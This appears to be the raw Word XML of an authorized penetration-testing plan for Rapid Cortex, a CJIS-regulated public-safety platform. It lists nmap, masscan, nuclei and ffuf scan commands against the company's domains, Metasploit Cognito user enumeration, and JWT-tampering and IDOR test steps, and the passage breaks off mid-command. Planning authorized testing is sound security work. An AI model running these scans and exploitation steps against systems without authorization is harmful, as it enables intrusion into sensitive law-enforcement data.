    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="7C3AED" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="F5F3FF" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">File AWS support request under 'Security' before any network scanning or load-testing that could trigger AWS abuse detection. Include start/end dates, source IPs, and target account ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">CJIS Compliance Requirement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid Cortex serves agencies subject to the FBI CJIS Security Policy v5.9. Section 5.10 (Security Assessment) requires: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Penetration testing as part of the security assessment process for systems accessing CJI</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Tests conducted by qualified, independent personnel</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Results documented and remediated within defined timeframes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Critical findings remediated within 30 days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Assessment results reviewed by agency Information Security Officers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Preferred firms with CJIS penetration testing experience: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2880"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Firm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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Specialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Notes</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Coalfire</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CJIS, FedRAMP, public sector</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Preferred for CJIS-specific engagements</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Tevora</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Public safety, law enforcement tech</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Experience with CAD/RMS systems</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Bishop Fox</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Web apps, cloud infrastructure</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Strong AWS expertise</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Rapid7 MDR</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Managed detection + pen test</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Good for ongoing retainer</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NCC Group</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Critical infrastructure</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Strong for transit/hospital verticals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Phase 1 — Network Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Network port scanning identifies open ports, running services, and exposed software versions on Rapid Cortex infrastructure. This phase maps the external attack surface before any exploitation attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Discover all externally accessible services, identify unexpected open ports, and detect outdated software versions with known CVEs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Tool — Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Full TCP scan with service version detection and default scripts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV -sC -p- api.rapidcortex.us -oA rc-api-scan</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UDP scan — often overlooked, catches DNS amplification and SNMP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sU --top-ports 100 api.rapidcortex.us</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OS fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -O api.rapidcortex.us</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Aggressive scan — version detection + scripts + traceroute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -A -T4 api.rapidcortex.us app.rapidcortex.us www.rapidcortex.us</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Scan all Rapid Cortex domains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV -p 80,443,8080,8443,8000,3000 \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  api.rapidcortex.us \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  app.rapidcortex.us \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  www.rapidcortex.us \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  api-staging.rapidcortex.us \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  api-dev.rapidcortex.us \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -oA rc-all-domains-scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Additional Tools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2520"/>
        <w:gridCol w:w="6120"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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Command</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Masscan</w:t>
            </w:r>
          </w:p>
        </w:tc>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Fast large-range port scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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masscan -p0-65535 --rate=1000 {IP}</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Shodan CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>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Passive recon — no traffic to target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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shodan host api.rapidcortex.us</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Naabu</w:t>
            </w:r>
          </w:p>
        </w:tc>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Fast port discovery (ProjectDiscovery)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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naabu -host api.rapidcortex.us -p -</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Nuclei</w:t>
            </w:r>
          </w:p>
        </w:tc>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Template-based CVE scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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nuclei -u api.rapidcortex.us -t cves/</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WhatWeb</w:t>
            </w:r>
          </w:p>
        </w:tc>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Technology fingerprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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whatweb api.rapidcortex.us</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Wafw00f</w:t>
            </w:r>
          </w:p>
        </w:tc>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WAF detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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wafw00f https://api.rapidcortex.us</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid Cortex Attack Surface — What to Look For</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API Gateway endpoints exposed beyond /api/* paths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Lambda function URLs accidentally left public (format: *.lambda-url.us-east-1.on.aws)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S3 bucket endpoints resolving publicly — check for DirectoryBucketListing</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CloudFront distributions with misconfigured origin access (direct S3 origin bypass)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Any port other than 443 responding on production domains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ALB or EC2 instances directly accessible, bypassing API Gateway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Development or staging environments accessible from public internet</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CAP ingest endpoint rate limiting — /api/cad/cap/ingest/{agencyId} is public</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QR report endpoint — /api/report/{qrId} must load fast but not expose internal data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</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Only port 443 responds on production domains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S3 bucket URLs publicly accessible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Lambda function URLs publicly accessible without auth</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ALB direct access bypassing API Gateway authorizer</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All staging/dev environments require VPN or IP allowlist</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Phase 2 — Active Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Active exploitation uses discovered vulnerabilities to attempt to gain unauthorized access, escalate privileges, or extract data. This phase follows the reconnaissance and scanning phases and must only target systems with explicit written authorization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Methodology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0"/>
        <w:gridCol w:w="3240"/>
        <w:gridCol w:w="6120"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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1. Reconnaissance</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Map all endpoints, auth flows, and data paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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Burp Suite, ffuf, curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2. Vulnerability Scan</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Automated detection of known CVEs and misconfigs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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Nuclei, OWASP ZAP, npm audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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3. Exploitation</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Attempt to leverage discovered vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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Metasploit, Burp Suite Pro, custom scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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4. Post-Exploitation</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Determine blast radius from a compromised foothold</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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Manual analysis, AWS CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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 Reporting</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Document every finding with reproduction steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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Manual documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Launch Metasploit console</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</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Search for relevant modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">search type:auxiliary name:jwt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">search type:exploit name:api</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">search cve:2024</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Cognito user pool enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">use auxiliary/scanner/http/cognito_user_enum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS cognito-idp.us-east-1.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">set USERPOOL_ID us-east-1_XXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite Pro</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Intercept all API traffic from the web and desktop clients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Replay requests with modified JWT claims (tamper with agencyId, role, userId)</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Active scan all discovered endpoints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Test for IDOR — increment/modify resource IDs in URLs and request bodies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Test CORS — send requests with arbitrary Origin headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf — Endpoint Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Fuzz API paths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -w /usr/share/wordlists/api-paths.txt \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
